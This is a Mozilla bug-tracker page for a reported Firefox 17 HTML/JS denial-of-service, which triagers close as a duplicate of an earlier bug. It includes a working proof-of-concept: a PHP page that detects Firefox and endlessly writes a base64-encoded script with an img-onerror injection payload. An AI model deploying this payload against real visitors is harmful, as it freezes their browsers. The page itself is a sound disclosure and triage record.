If you think a bug might affect users in the 57 release, please set the correct tracking and status flags for Release Management.

HTML/JS DOS Vulnerability

RESOLVED DUPLICATE of bug 822264

Status

()

Core
Security
RESOLVED DUPLICATE of bug 822264
5 years ago
a year ago

People

(Reporter: curtisk, Unassigned)

Tracking

17 Branch
Points:
---
Bug Flags:
sec-bounty -

Firefox Tracking Flags

(Not tracked)

Details

Reported to sec@
==========//==========
 Mozilla Firefox HTML/JS DOS Vulnerability 

    Title : Mozilla Firefox HTML/JS DOS Vulnerability 

    Version : Mozilla Firefox Beta Version and Normal 17.0.1

    Tested : windows XP SP3 & Windows 7 SP1 

    Proof Of Concept Code :

    <!DOCTYPE html>
    <html>
    <body>
    <?php
    /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Shubham Raj 
    Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
    $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0Z SAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29 iYXInKTt9PC9zY3JpcHQ+'; 
    //check if victim is Using Mozilla Firefox
    $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
    if ($firefox)
    {
    //loop forever
    while(1) {
    //print exploit code infinite times.
    print(base64_decode($exploit));
    }
    }
    ?>
    </body>
    </html>

Comment 1

5 years ago
Seems remarkably similar to bug 822264. What's the difference, other than the name in the comment?
(In reply to Robert Longson from comment #1)
> Seems remarkably similar to bug 822264. What's the difference, other than
> the name in the comment?

You are correct, there must be a site that has these they are being copied from. Or a group of people is trying to get the same work in by different reporters. Thanks for the catch, I will dupe this against the other bug.
Status: NEW → RESOLVED
Last Resolved: 5 years ago
Flags: sec-bounty-
Resolution: --- → DUPLICATE
Duplicate of bug: 822264

Updated

2 years ago
Group: core-security → core-security-release
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.